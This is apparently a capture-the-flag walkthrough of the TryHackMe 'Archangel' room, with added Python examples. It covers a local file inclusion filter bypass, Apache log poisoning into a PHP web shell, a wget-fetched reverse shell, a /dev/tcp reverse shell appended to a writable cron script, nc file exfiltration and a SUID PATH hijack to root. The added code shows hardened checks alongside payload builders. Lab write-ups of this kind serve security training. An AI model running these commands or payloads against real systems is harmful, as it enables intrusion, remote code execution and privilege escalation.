Opening move, port scan: rustscan -a 10.10.163.60
Directory brute-force: python3 dirsearch.py -u http://10.10.163.60/ -e all
Looking at the homepage, it contains /flag.
Task hint: Find a different hostname. The hostname is mafialive.thm, so map it in /etc/hosts:
sudo vim /etc/hosts
10.10.163.60 mafialive.thm
Scan paths again against the new virtual host: python3 dirsearch.py -u http://mafialive.thm/ -e all
http://mafialive.thm/robots.txt lists /test.php
Try a Base64 payload (the php://filter/convert.base64-encode/resource=... wrapper) to pull the source of test.php through its own include; decoded, it reads:
<!DOCTYPE HTML>
<html>
<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php
//FLAG: thm{explo1t1ng_lf1}
// strpos is a plain substring test: it matches the literal characters only
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
// deny only the literal "../.."; require the allowed directory to appear anywhere in the value
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
include $_GET['view']; // no realpath(), no extension check, wrappers such as php://filter are accepted
}else{
echo 'Sorry, Thats not allowed';
}
}
?>
</div>
</body>
thm{explo1t1ng_lf1}
The filter rejects any view containing the literal ../.. and insists that /var/www/html/development_testing appear somewhere in the value. Because strpos only matches the literal, .././.. climbs two directories without ever containing ../.., so the required prefix can be followed by as many of those as needed:
curl 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd'
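To make the bypass concrete, here is an added example (not code from the writeup or the room): a Python port of the gate in test.php, the payload builder for the .././ chain, and the check the page should have used, which canonicalises the path before comparing it with the allowed directory. The BASE and blocked strings are taken from test.php above; everything else is mine. In PHP the canonicalisation step is realpath(), which additionally follows symlinks; posixpath.normpath here is the lexical equivalent and needs no filesystem.

```python
import posixpath

# Values taken from test.php on the page.
BASE = "/var/www/html/development_testing"
BLOCKED = "../.."


def vulnerable_check(view: str) -> bool:
    """Port of the gate in test.php: two plain substring tests (PHP strpos)."""
    return BLOCKED not in view and BASE in view


def traversal_payload(target: str, depth: int = 7) -> str:
    """Build the writeup's view= value: required prefix, then '.././' repeated.
    Each '.././' climbs one directory without ever forming the literal '../..'."""
    return BASE + "/" + ".././" * depth + target.lstrip("/")


def resolves_to(view: str) -> str:
    """Lexical resolution of '.' and '..' (what the kernel does on open()),
    so the reader can see which file the include would actually load."""
    return posixpath.normpath(view)


def hardened_check(view: str, base: str = BASE) -> bool:
    """Canonicalise first, then require the result to sit under base.
    Rejects wrappers (php://, data://) and NUL bytes up front."""
    if "\x00" in view or not view.startswith("/"):
        return False
    resolved = posixpath.normpath(view)
    return resolved == base or resolved.startswith(base + "/")


if __name__ == "__main__":
    samples = (
        BASE + "/mrrobot.php",
        BASE + "/../../etc/passwd",
        traversal_payload("/etc/passwd"),
        "php://filter/convert.base64-encode/resource=" + BASE + "/test.php",
    )
    for v in samples:
        print(f"test.php: {'pass' if vulnerable_check(v) else 'deny'}  "
              f"hardened: {'pass' if hardened_check(v) else 'deny'}  {v}")
```

The naive ../.. payload is denied while the .././ chain passes the original gate and resolves to /etc/passwd; the php://filter wrapper used to read the source also passes the original gate, because the required directory only has to appear somewhere in the string. The hardened check rejects all three and still allows the real files under the directory. A prefix match is still a weaker control than an allowlist of the handful of files the page actually needs to include.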
The same traversal reads the Apache access log, /var/log/apache2/access.log, which is the file we will poison:
curl 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log'
Poison the log with a raw request over nc. It has to be a raw socket: curl or a browser would percent-encode the tag, and an encoded <?php in the log is just text. First a harmless probe to confirm that PHP in the log gets executed when the log is included:
nc 10.10.163.60 80
GET /?<?php phpinfo(); ?>
then the web shell, taking its command from the B parameter (quote the key; an unquoted B only works where PHP still downgrades an undefined constant to a string):
nc 10.10.163.60 80
GET /<?php system($_GET['B']); ?>
Every include of the log now runs whatever B holds. Serve a reverse-shell script s from 10.13.21.55:8000, fetch it through the web shell, start the listener, then execute it:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=wget%2010.13.21.55:8000/s%20-O%20/tmp/s
nc -vlk 7877
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=bash%20/tmp/s
Upgrade to a proper tty: python3 -c 'import pty; pty.spawn("/bin/bash")'
thm{lf1_t0_rc3_1s_tr1cky}
Enumerate with linpeas:
wget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh
linpeas shows a cron job that runs /opt/helloworld.sh as the user archangel, and we have read and write permission on /opt/helloworld.sh. Append a reverse shell to it:
echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh
With a listener on 7878, wait a minute for the cron to fire and the shell connects automatically!!
thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}
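The check linpeas performs here, written out as an added example (my code, not the writeup's or linpeas's): parse system-crontab lines, pick out the script each job runs, flag the ones that are world-writable, and append the reverse shell the way the writeup did. The crontab text is a constructed sample modelled on the job above, the audit runs against a staged temporary tree rather than the live filesystem, and the listener host and port are placeholders.

```python
import os
import shlex
import stat
import tempfile

# Constructed sample in /etc/crontab format (schedule, user, command),
# modelled on the job linpeas reported. Not copied from the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
*/1 *  * * *   archangel /opt/helloworld.sh
17 *   * * *   root      cd / && run-parts --report /etc/cron.hourly
"""

REVERSE_SHELL = "bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


def parse_system_crontab(text):
    """(schedule, user, command) for each job in /etc/crontab or /etc/cron.d
    format; comments, blank lines and VAR=value assignments are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0] or len(fields) < 7:
            continue
        jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def script_path(command):
    """Absolute path of the program a job runs, or None for shell built-ins
    and bare names (those are a PATH question, not a file-permission one)."""
    first = shlex.split(command)[0]
    return first if first.startswith("/") else None


def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def hijackable_jobs(crontab_text, root=""):
    """Jobs whose script is world-writable. `root` prefixes every path so the
    audit can run against a staged tree instead of the live filesystem."""
    found = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        path = script_path(command)
        if path and os.path.isfile(root + path) and world_writable(root + path):
            found.append((user, path))
    return found


def append_payload(path, lhost, lport):
    """The writeup's step: append a reverse shell so the next run connects back."""
    line = REVERSE_SHELL.format(lhost=lhost, lport=lport)
    with open(path, "a") as f:
        f.write(line + "\n")
    return line


def stage_demo(mode=0o777):
    """Stage /opt/helloworld.sh with the given mode under a temp root and audit it."""
    root = tempfile.mkdtemp()
    os.makedirs(root + "/opt")
    script = root + "/opt/helloworld.sh"
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho hello world\n")
    os.chmod(script, mode)
    return root, hijackable_jobs(SAMPLE_CRONTAB, root=root)


if __name__ == "__main__":
    root, jobs = stage_demo()
    for user, path in jobs:
        print(f"{user} runs world-writable {path}")
        print("appended:", append_payload(root + path, "10.13.21.55", "7878"))
```

Appending rather than overwriting keeps the script's original behaviour, so the job still succeeds and nothing in the cron log changes except the timing. The same logic applies to the directories in the job's PATH line: a writable directory early in that PATH is a hijack even when the script itself is read-only.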
In archangel's home there is a secret folder containing a backup binary. Pull it out with nc:
on the attacker: nc -l -p 1234 > meow
on the target: nc 10.13.21.55 1234 < backup
Hmph! A binary at this level doesn't even need IDA; r2 is enough:
r2 meow
aaa (analyse everything)
s main
VV (visual graph of main)
main calls cp by its bare name, so the lookup goes through PATH. Create a fakepath directory holding our own cp, put it first on PATH and run backup, which executes with root privileges (SUID):
mkdir fakepath
export PATH=/home/archangel/fakepath:$PATH
echo '#!/bin/bash' > /home/archangel/fakepath/cp
echo '/bin/bash' >> /home/archangel/fakepath/cp
chmod +x /home/archangel/fakepath/cp
./backup
thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}
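An added example of the PATH-hijack mechanics (mine, not the writeup's or the room's): extract the bare program name from a system() argument, resolve it the way execvp and /bin/sh do (first match in PATH order), and show that planting a script in a directory prepended to PATH changes which cp runs. The system() string is a constructed stand-in; the real command inside backup is not reproduced here, and the staged bin and fakepath directories are temporary.

```python
import os
import shlex
import tempfile

# Constructed stand-in for the command main passes to system();
# the real string inside backup is not reproduced here.
SAMPLE_SYSTEM_ARG = "cp /home/archangel/secret/* /opt/backupfiles/"


def relative_program(system_arg):
    """Bare program name a system()/execvp call will look up via PATH, or None
    if it is already an absolute path (the safe form for a SUID binary)."""
    prog = shlex.split(system_arg)[0]
    return None if prog.startswith("/") else prog


def resolve_in_path(name, path_env):
    """First executable called `name` in PATH order: the rule execvp and /bin/sh apply."""
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def plant_fake(directory, name, body="/bin/bash"):
    """Write an executable script `name` into `directory` (the writeup's fakepath/cp)."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write("#!/bin/bash\n" + body + "\n")
    os.chmod(path, 0o755)
    return path


def demo():
    """Stage a system bin dir and a fakepath dir, then resolve cp with and
    without fakepath at the front of PATH."""
    root = tempfile.mkdtemp()
    sysbin = os.path.join(root, "bin")
    fakepath = os.path.join(root, "fakepath")
    os.makedirs(sysbin)
    os.makedirs(fakepath)
    real_cp = plant_fake(sysbin, "cp", 'exec /bin/cp "$@"')   # stands in for the real cp
    fake_cp = plant_fake(fakepath, "cp")                       # the hijack
    prog = relative_program(SAMPLE_SYSTEM_ARG)
    before = resolve_in_path(prog, sysbin)                     # victim's PATH, untouched
    after = resolve_in_path(prog, fakepath + ":" + sysbin)     # after export PATH=fakepath:$PATH
    return real_cp, fake_cp, before, after


if __name__ == "__main__":
    real_cp, fake_cp, before, after = demo()
    print("before:", before)
    print("after: ", after)
```

The fix on the binary side is the mirror image: call /bin/cp by absolute path and set a fixed PATH (or clear the environment) before any system() or exec, and better, avoid system() in a SUID program altogether, since the caller controls the environment that /bin/sh inherits.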